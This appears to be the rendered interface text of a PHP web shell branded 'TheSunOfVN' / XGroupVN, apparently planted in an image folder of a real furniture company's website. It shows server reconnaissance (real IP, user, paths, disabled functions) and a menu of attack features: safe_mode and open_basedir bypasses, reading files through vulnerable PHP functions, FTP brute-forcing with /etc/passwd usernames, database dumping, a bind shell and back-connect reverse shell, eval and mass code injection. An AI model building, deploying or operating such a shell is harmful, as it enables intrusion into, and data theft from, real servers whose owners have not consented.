..:: TheSunOfVN ::..

23-02-2012 10:47:09 [ phpinfo ] [ php.ini ] [ Cpu ] [ Memory ] [ Users ] [ Brute ] [ ln -s all ] [ Tools ] [ Mass Code Injection ] [ tmp ]
safe_mode: ON Open_Basedir: /home/binhph60/:/tmp:/var/tmp:/usr/local/lib/php/ Safe_Exec_Dir: NONE Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.14 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,escapeshellarg,show_source,symlink,mail,execl,posix_getpwuid
Useful: mod_include(SSI)
Downloaders: fopen
Free space : 73.33 GB Total space: 213.6 GB
Server IP: [ 112.213.89.91 ] -- Your IP: [ 38.107.179.241 ]

uname -a :
sysctl :
$OSTYPE :
Server :
id :
pwd :

Linux ns8991.dotvndns.vn 2.6.18-194.17.4.el5 #1 SMP Mon Oct 25 15:50:53 EDT 2010 x86_64
-

Apache
user=apache uid=101 gid=500
/home/binhph60/domains/binhphufurniture.com/public_html/Admin/Product_Image ( u--------- )

Executed command: safe_dir

...::: ACCESS DENIED :::...

:: Work in safe_mode ::

Work directory 4

:: read file from PLUGIN ::

where file in server 4

:: Create/Delete File/Dir ::

name 4

:: Chown/Chgrp/Chmod ::

Command 4

param1 4 param2 4

:: Edit files ::

File for edit 4

:: read dir from vul reg_glob ::

read dir 4

:: read dir from vul root ::

read dir 4

:: read file from vul copy() ::

where file in server 4

:: read file from vul ini_restore() ::

where file in server 4

:: Bypass php 5.2.6 ::

Cat file 4

:: Bypass php 5.2.9 ::

Cat file 4

:: PHP Bypass ::

Read File

File : 4

View Dir

Dir : 4

:: DeZender ::

Cat file 4

:: ionCube extension safe_mode bypass ::

Cat file 4

:: Aliases ::

Select alias 4

:: Find text in files ::

Find text 4
In dirs 4	*
Only in files 4	*

:: Test bypass open_basedir with cURL functions ::

Cat file 4

:: read file from vul curl() ::

where file in server 4

:: Eval PHP code ::

:: Upload files on server ::

Local file 4
Local file 4
Local file 4

Local file 4
Local file 4

:: Download files from server ::

file 4
Archivation 4	without archivation zip gzip bzip

:: FTP-bruteforce ::

FTP-server:port 4
	* use username from /etc/passwd for ftp login and password ( Users list )
	Use reverse (user -> resu) login for password

:: Databases ::

Dump database table

Type 4
SQL-Server : Port 4	:
Login : Password 4	:
Db . Table 4	.
Save dump in file 4

Run SQL query

Type 4
SQL-Server : Port 4	:
Login : Password 4	:
Database 4
SQL query 4

:: Net ::

Bind port to /bin/bash

Port 4
Password for access 4
Use 4

back-connect

IP 4
Port 4
Use 4

:: safe_mode off ::

Close safe_mode with php.ini
Close security_mod with .htaccess
write ini.php file to close safe_mode with ini_restore vul

Use 4
Use 4
Use 4

_____TheSunOfVN_____
----------XGroupVN----------

Generation time: 0.0882 seconds ?>